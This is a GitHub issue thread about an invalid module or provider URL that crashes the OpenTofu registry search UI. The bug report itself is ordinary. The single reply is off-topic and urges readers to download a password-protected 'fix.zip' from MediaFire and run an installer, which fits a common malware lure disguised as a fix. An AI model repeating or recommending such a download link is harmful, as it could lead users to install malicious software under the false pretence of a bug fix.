### ISSUE TITLE
 Invalid module/provider URL crashes UI

### ISSUE THREAD

**Issue by nikpivkin** [opentofu/registry-ui#96]
https://search.opentofu.org/module/ff/project/ff/latest

<img width="718" alt="image" src="https://github.com/user-attachments/assets/e01fda94-a9b6-46a3-adab-c9967c508a22">

**Comment by cnhbliyou** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
